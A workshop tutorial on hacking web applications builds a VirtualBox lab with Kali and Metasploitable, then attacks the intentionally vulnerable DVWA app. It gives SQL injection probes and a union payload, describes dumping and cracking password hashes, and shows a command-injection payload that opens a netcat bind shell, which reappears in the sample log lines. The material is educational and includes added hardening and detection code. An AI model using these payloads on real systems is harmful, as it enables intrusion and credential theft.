
Web Application Hacking Techniques Part - 4


Hacking into Web Applications

Introduction

Welcome to the “Hacking into Web Applications” module of this workshop. So far we have covered the theoretical part of the course. To recap the previous modules quickly: we have seen how a web application works, how web applications are architected, and which attack vectors are usually used to compromise or hack into them.

What We Will Cover

In this module we move to hands-on labs that show how to hack into web applications. We will cover two labs, which is enough to give you a flavour of the concepts behind attacking any server-side web application.

Prerequisites

• Completion of the previous three modules is recommended
• Basic understanding of TCP/IP
• Basic knowledge of web applications
• Understanding of the basics of SQL injection
• Basic knowledge of exploitation concepts
• Knowledge of HTML and any server-side programming language
• A virtual lab environment for the demonstrations
 
Virtual Lab Setup

• Downloading and installing VirtualBox
• Installing Kali Linux as a virtual machine
• Downloading the vulnerable operating system
• Installing the vulnerable operating system as a virtual machine

Step 1: Downloading and Installing VirtualBox

Download link: https://www.virtualbox.org/wiki/Downloads

Select and download the binary for your operating system. In our case we install VirtualBox-4.3.12-93733-OSX from the download link above, as shown below.






Select the installation location or customize the installation as shown above; however, it is recommended to leave the settings at their defaults and start the installation.




The VirtualBox installation is now complete. Our next step is to set up Kali Linux as a virtual machine so that we can use the tools that come pre-installed in Kali Linux.

Step 2: Installing Kali Linux as a Virtual Machine

Configuring New Machine

Our next step is to install the Kali Linux operating system as a virtual machine. For this, start VirtualBox by clicking its icon in Applications; it opens quickly, as shown below.


Configure Operating System Details

Now click the New button in the top-left corner to set up a new machine, type a name and select the operating system type, then select the operating system version to install. Configure this as shown in the figure below. Once this is complete, you will be prompted to select the memory for this virtual machine.



Configure Memory Size

Configure the memory size. As we will be running Kali Linux from the Live CD, 512MB is enough to start with, and it can be increased later if it turns out not to be enough at run time.



Configure Hard Drive

Our next step is to configure the hard drive type and its size. For running Kali Linux from the Live CD, you can set the hard drive size to 10GB at most.




To save disk space, don’t allocate the 10GB immediately; select the dynamically allocated option instead.



Configure Other Hard Drive Options

Set the size and name of the virtual hard disk you have just configured and create the disk as shown below.



At this point you should already have the Kali Linux ISO downloaded, so that you can select it here and boot from the CD-ROM at first boot. To download the Kali Linux ISO, browse to the link below to get your free copy. Depending on your machine type, select one of the available ISO images.

Download link: http://www.kali.org/downloads/. To give an idea, the snapshot below shows the images available from that link at the time this workshop was documented.

Download one of the ISO files and select the image as shown below to configure your virtual machine. Use the 64-bit or 32-bit version depending on your machine’s architecture.

If you have selected the ISO and no error occurs, you should see a screen showing the following configuration.



Running Kali as a Live Operating System

We are all set to boot the Kali ISO we configured while setting up the virtual machine. Start the newly created virtual machine and you will see the Kali Linux boot screen shown below.


Step 3: Downloading the Vulnerable Operating System

We have set up Kali as a virtual machine; our next step is to get some vulnerable web applications on which we can practice and demonstrate actual hacking skills in a virtual lab environment. The easiest way to achieve this is to get the Metasploitable ISO from Rapid7, which brings us to the next section.

What is Metasploitable?

From the vendor’s mouth:

    Metasploitable is a virtual machine based on Linux that contains several intentional vulnerabilities for you to exploit. Metasploitable is essentially a penetration-testing lab in a box, available as a VMware virtual machine (VMX). (The Metasploitable login is “msfadmin”; the password is also “msfadmin”.)

The Rapid7 Metasploit team creates Metasploitable. By downloading Metasploitable from Rapid7.com, you’ll be sure to get the latest, clean version of the vulnerable machine, plus you’ll get it from our lightning fast download servers.

Download link

https://information.rapid7.com/metasploitable-download.html

However, you need to complete a short form so that the community knows who you are. Downloading this vulnerable operating system is quick and easy. For your convenience, we have included a snapshot of the form (as it was at the time this workshop was developed), which must be completed before you can download Metasploitable.


Metasploitable comes as a zip file, which you unzip to get the files used for the virtual machine. After unzipping you should see the following files. As this image was built for VMware, you may see a couple of extra files.



Once that is done, you should be able to import Metasploitable into VirtualBox.

Step 4: Installing the Vulnerable Operating System as a Virtual Machine

Open VirtualBox and click on ‘New Virtual machine wizard’. Type a name of your choice. I am using ‘Metasploitable-2’. Choose ‘Type’ as Linux and ‘Version’ as Ubuntu. Click on Next.


Choose a memory size appropriate to the RAM available on your host machine, although 1512MB is more than enough. Click on Next.



In the hard drive creation window, select the option “Use an existing virtual hard drive”, browse to the folder where we extracted the zip file and select the ‘vmdk’ file. Click on Create.

Alternatively, you can continue with the “Create a virtual hard drive now” option and later change it to the Metasploitable hard drive.

Now select the disk type as Virtual Machine Disk and continue setting up the virtual machine.


Use dynamic allocation of hard drive space, as we did previously for Kali Linux, and click Continue to move on to the next step of virtual machine creation.

Give the hard drive a convenient name so that you can remember it. This is useful because the hard drive is saved as a file, and a sensible naming convention makes it easier to move the file later if required.


Now select the Metasploitable disk image from the download. Set this as the hard drive and you are all set to boot this virtual machine as the vulnerable operating system in your virtual lab environment.

The vulnerable operating system is now ready to be exploited in your virtual lab environment.


The default login was given earlier in this module; don’t forget to change the password.


Hacking into Web Applications

We are now all set to hack into the web applications running in this vulnerable operating system (Metasploitable). Damn Vulnerable Web Application (DVWA) was developed to teach web application hacking. It is intentionally built with vulnerabilities such as SQL injection, command execution, file upload and XSS, so that you can practice the skills you have learned in this workshop so far.

Virtual Environment

Having installed Kali Linux and Metasploitable to build the virtual hacking environment, let’s run both machines side by side so that we can see the local IP addresses of the two virtual machines.


Note the IP addresses of both machines. In our lab environment we have the following scheme.

Kali Linux IP: 172.20.10.2

Metasploitable IP: 172.20.10.3

Let’s quickly browse and see what is running on the Metasploitable machine as a web application.


Okay, we have quite a few web applications running on Metasploitable 2. Let’s pick DVWA, which we just mentioned.



Log in with the default credentials: username admin, password password.

Using SQL Injection Techniques

We have explained SQL injection in some detail in earlier modules. Let’s now use SQL injection to hack into a web application. At this stage you should have Metasploitable up and running to keep pace with the workshop.

Browse to the SQL Injection page and you should see the following screen.


Now type 2 in the User ID field above and hit Submit to see the outcome.


This is just information gathering about the application flow and how it works. Next, let’s give some bogus input in the User ID field and submit it. Before we do that, note the URL.

Web application address: http://172.20.10.3/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#

The important thing to notice in the URL is [id=2]: the application takes the input as an ID and runs a search for it in the backend database. We will now probe for SQL injection by providing ['] as the input via the URL.

SQL injection probe: http://172.20.10.3/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#

You should see the screen below with the error that the probe above generates.



From this error we learn two important things:

• The application is vulnerable to SQL injection
• The backend database is MySQL

Now let’s inject some SQL and find out more sensitive information.

SQL Injection Attack Vector: 1' union all select system_user(),user()#

With the above attack vector we find out which database user the web application connects as. Type the attack vector in the User ID field and submit; you should get the following information.
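To make clear why the single-quote probe produces a database error and why the union payload appends attacker-chosen rows to the result, here is an added Python example (not code from the original post or from DVWA). It builds an in-memory SQLite table with constructed sample rows as a stand-in for DVWA’s MySQL users table, runs the vulnerable string-concatenation lookup beside a parameterised one, and reports what each returns. Because SQLite has no user()/system_user() functions and comments with -- rather than #, the payload uses sqlite_version() and -- in their place; the function and column names are assumptions.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (sample rows with placeholder hashes, not DVWA's data).
SAMPLE_USERS = [
    (1, "admin", "admin", "<hash-placeholder-1>"),
    (2, "Gordon", "Brown", "<hash-placeholder-2>"),
    (3, "Hack", "Me", "<hash-placeholder-3>"),
]


def make_db():
    """Create an in-memory SQLite database (assumed stand-in for the MySQL backend)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA low-security style: the id parameter is pasted into the SQL text,
    so whatever the user types becomes part of the query."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: a bound parameter is always treated as a value, never as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(lookup, conn, user_id):
    """Run one lookup and report either the rows or the database error text,
    mirroring what the DVWA page shows in the browser."""
    try:
        return {"rows": lookup(conn, user_id)}
    except sqlite3.OperationalError as exc:
        return {"error": str(exc)}


# The union payload from the write-up adapted to SQLite: sqlite_version() stands in for user(),
# and '--' stands in for MySQL's '#' comment marker.
UNION_PAYLOAD = "1' union all select sqlite_version(), 'injected'--"


def demo():
    """Compare both implementations on a normal id, the single-quote probe and the union payload."""
    conn = make_db()
    return {
        "vuln_normal": probe(lookup_vulnerable, conn, "2"),
        "vuln_quote": probe(lookup_vulnerable, conn, "'"),
        "vuln_union": probe(lookup_vulnerable, conn, UNION_PAYLOAD),
        "safe_normal": probe(lookup_safe, conn, "2"),
        "safe_quote": probe(lookup_safe, conn, "'"),
        "safe_union": probe(lookup_safe, conn, UNION_PAYLOAD),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:12s} {outcome}")
```

Running it shows the vulnerable lookup raising a syntax error for the lone quote (the same signal the DVWA error page gives away, including which database engine is in use) and returning an extra injected row for the union payload, while the parameterised lookup returns an empty result for both because the whole string is compared against user_id as a value.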


Also notice the URL above: it carries our SQL injection attack vector. Now let’s find out more sensitive information with the attack vectors shown below.




Let’s continue and grab more information. First, list all the databases available on this backend MySQL server.

Now that we know the names of all the databases configured on this MySQL server, let’s start grabbing table information.

You will find a long list of tables. Let’s select the user table to grab user information.

We have reached the columns available in the user table; now let’s grab the user information stored in it and find the passwords.


We now have the password hashes, but these are not the real passwords. Not a problem: let’s quickly crack one of them. We went to the website crackstation.net and tried the third hash value; the results are shown below.


Password seems to be charley! Hey charley you have been hacked.

Command Execution Attack Vectors

We have spoken about command execution attacks in this module; this is a very dangerous vulnerability. If you can exploit it, you don’t need to go through all the pain of injecting via SQL. Let’s quickly check whether this application is vulnerable to command execution.

Log in to DVWA, browse to the Command Execution page, enter the following command and hit Run.

Command Execution Attack Vector: 172.20.10.1| mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

This forces the web application to execute netcat and listen on port 4444. Now go to msfconsole and run the commands shown in the snapshot below.



You can see that we used the multi/handler with a bind_tcp payload and successfully exploited the vulnerability to own this web application.


You can navigate through the session and execute system-level commands.
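The vulnerability exploited above exists because the page concatenates the ip field into a shell command line. The following Python script is an added example (not DVWA’s code or the author’s) that puts that pattern beside a hardened version, which allow-lists the value as a literal IP address and passes it as one argv element to a child process without a shell, and adds a small detector that scans web-server access-log lines for requests to the exec page whose ip parameter carries shell metacharacters or is not a bare IP address. The function names, the combined log format and the sample log lines are assumptions; the constructed lines put the parameters in the query string so the check can be shown on a standard access log, whereas a form submitted by POST would need request-body or WAF logging for the same check.

```python
import ipaddress
import re
import subprocess
import sys
from urllib.parse import parse_qs, urlsplit

# Characters that let a shell chain or redirect commands; the write-up's payload uses '|', ';' and '>'.
SHELL_METACHARS = set("|;&`$()<>\n")


def vulnerable_command_line(ip_param):
    """DVWA low-security style: untrusted text concatenated into a shell command line.
    Returned rather than executed, to show exactly what /bin/sh would be handed."""
    return "ping -c 3 " + ip_param


def validate_ip(ip_param):
    """Allow-list check: the value must parse as a literal IPv4 or IPv6 address."""
    return str(ipaddress.ip_address(ip_param.strip()))


def accepted(ip_param):
    """True if the hardened check would let this value through."""
    try:
        validate_ip(ip_param)
        return True
    except ValueError:
        return False


def safe_argv(ip_param):
    """Hardened form: the validated host placed in an argv list, to be run without a shell."""
    return ["ping", "-c", "3", validate_ip(ip_param)]


def child_sees(arg):
    """Hand one argument to a child process with no shell and return it as the child received it.
    The Python interpreter stands in for ping here so the example runs anywhere."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", arg],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


# Combined-format access log line (assumed format for the constructed sample below).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def flag_exec_requests(log_lines, path="/dvwa/vulnerabilities/exec/"):
    """Detection: flag requests to the DVWA command-execution page whose 'ip' parameter
    is not a bare IP address or carries shell metacharacters."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != path:
            continue
        # parse_qs percent-decodes the value, so '%7C' in the log is examined as '|'
        for value in parse_qs(url.query, keep_blank_values=True).get("ip", []):
            metachars = sorted(SHELL_METACHARS & set(value))
            if metachars or not accepted(value):
                flagged.append({
                    "src": m.group("src"),
                    "ts": m.group("ts"),
                    "ip_param": value,
                    "metachars": metachars,
                })
    return flagged


# Constructed sample log lines (not captured from a real server): a normal ping request,
# the write-up's pipe-to-netcat payload, a hostname instead of an IP, and an unrelated page.
SAMPLE_LOG = [
    '172.20.10.2 - - [10/Jun/2014:10:15:32 +0000] "GET /dvwa/vulnerabilities/exec/?ip=172.20.10.1&Submit=submit HTTP/1.1" 200 4417 "-" "Mozilla/5.0"',
    '172.20.10.2 - - [10/Jun/2014:10:16:05 +0000] "GET /dvwa/vulnerabilities/exec/?ip=172.20.10.1%7C+mkfifo+/tmp/pipe%3Bsh+/tmp/pipe+%7C+nc+-l+4444+%3E+/tmp/pipe&Submit=submit HTTP/1.1" 200 4380 "-" "Mozilla/5.0"',
    '172.20.10.2 - - [10/Jun/2014:10:17:41 +0000] "GET /dvwa/vulnerabilities/exec/?ip=localhost&Submit=submit HTTP/1.1" 200 4402 "-" "Mozilla/5.0"',
    '172.20.10.2 - - [10/Jun/2014:10:18:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4290 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    print(vulnerable_command_line("172.20.10.1| id"))
    print(safe_argv("172.20.10.1"), accepted("172.20.10.1| id"))
    for hit in flag_exec_requests(SAMPLE_LOG):
        print(hit)
```

The detector flags the netcat payload on its metacharacters and the hostname on the allow-list alone, which is the point of validating against a strict type rather than blocking a list of characters: the allow-list also catches inputs that use no metacharacter at all. child_sees demonstrates that, without a shell, a string such as "172.20.10.1| id" reaches the child as a single literal argument, so even the hardened path’s argv form is safe independently of the validation.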
 
In the next module, we will cover the OWASP Top 10 vulnerabilities.
